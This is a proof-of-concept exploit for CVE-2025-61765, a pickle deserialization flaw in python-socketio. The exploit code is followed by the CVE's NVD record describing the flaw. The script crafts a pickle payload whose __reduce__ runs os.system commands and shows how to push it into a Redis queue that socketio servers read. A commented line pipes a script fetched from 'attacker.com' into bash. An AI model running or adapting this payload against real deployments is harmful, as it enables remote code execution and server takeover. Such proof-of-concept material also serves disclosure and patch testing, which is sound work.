CVE-2025-61765

# CVE-2025-61765 PoC - Malicious pickle payload for python-socketio RCE # This payload demonstrates how an attacker with access to the message queue # can craft a pickle payload to achieve RCE when deserialized by python-socketio server import pickle import os class MaliciousPicklePayload: """ Crafted pickle payload that exploits CVE-2025-61765. When python-socketio server calls pickle.loads() on this payload, arbitrary code will be executed via the __reduce__ method. """ def __reduce__(self): # Command to execute on the target server # In real attack scenario, this could be reverse shell, data exfiltration, etc. command = "id > /tmp/pwned.txt" return (os.system, (command,)) def generate_malicious_payload(command="id > /tmp/pwned.txt"): """ Generate a malicious pickle payload to be injected into the message queue (e.g., Redis) that python-socketio servers consume. """ class Exploit: def __reduce__(self): return (os.system, (command,)) payload = pickle.dumps(Exploit()) return payload def simulate_attack(): """ Simulate the attack scenario: 1. Attacker gains access to Redis message queue 2. Attacker injects malicious pickle payload into the queue 3. python-socketio server consumes the message and deserializes it 4. Arbitrary code execution occurs """ # Step 1: Generate malicious payload malicious_payload = generate_malicious_payload("whoami > /tmp/rce_result.txt") print(f"[*] Generated malicious pickle payload ({len(malicious_payload)} bytes)") # Step 2: In a real scenario, inject into Redis: # import redis # r = redis.Redis(host='target-redis-host', port=6379) # r.lpush('socketio_queue', malicious_payload) print("[*] Payload would be injected into Redis queue") # Step 3: Demonstrate deserialization (what happens on server side) print("[*] Simulating server-side pickle.loads() call...") try: result = pickle.loads(malicious_payload) print(f"[!] Code executed! Result: {result}") except Exception as e: print(f"[*] Deserialization result: {e}") print("[*] Check /tmp/rce_result.txt for evidence of code execution") if __name__ == "__main__": simulate_attack() # Example: Injecting into Redis message queue used by python-socketio # The python-socketio server uses Redis lists/pubsub for inter-server communication # When it receives a message, it calls pickle.loads() on the data # # import redis # r = redis.Redis(host='vulnerable-redis', port=6379, password='compromised_password') # payload = generate_malicious_payload("curl http://attacker.com/shell.sh | bash") # r.lpush('socketio', payload) # or r.publish('socketio-channel', payload)

{"cve": {"id": "CVE-2025-61765", "sourceIdentifier": "[email protected]", "published": "2025-10-06T16:15:35.400", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "python-socketio is a Python implementation of the Socket.IO realtime client and server. A remote code execution vulnerability in python-socketio versions prior to 5.14.0 allows attackers to execute arbitrary Python code through malicious pickle deserialization in multi-server deployments on which the attacker previously gained access to the message queue that the servers use for internal communications. When Socket.IO servers are configured to use a message queue backend such as Redis for inter-server communication, messages sent between the servers are encoded using the `pickle` Python module. When a server receives one of these messages through the message queue, it assumes it is trusted and immediately deserializes it. The vulnerability stems from deserialization of messages using Python's `pickle.loads()` function. Having previously obtained access to the message queue, the attacker can send a python-socketio server a crafted pickle payload that executes arbitrary code during deserialization via Python's `__reduce__` method. This vulnerability only affects deployments with a compromised message queue. The attack can lead to the attacker executing random code in the context of, and with the privileges of a Socket.IO server process. Single-server systems that do not use a message queue, and multi-server systems with a secure message queue are not vulnerable. In addition to making sure standard security practices are followed in the deployment of the message queue, users of the python-socketio package can upgrade to version 5.14.0 or newer, which remove the `pickle` module and use the much safer JSON encoding for inter-server messaging."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-502"}]}], "references": [{"url": "https://github.com/miguelgrinberg/python-socketio/commit/53f6be094257ed81476b0e212c8cddd6d06ca39a", "source": "[email protected]"}, {"url": "https://github.com/miguelgrinberg/python-socketio/security/advisories/GHSA-g8c6-8fjj-2r4m", "source": "[email protected]"}, {"url": "https://www.bluerock.io/post/cve-2025-61765-bluerock-discovers-critical-rce-in-socket-io-ecosystem", "source": "[email protected]"}, {"url": "https://www.bluerock.io/post/cve-2025-61765-bluerock-discovers-critical-rce-in-socket-io-ecosystem", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}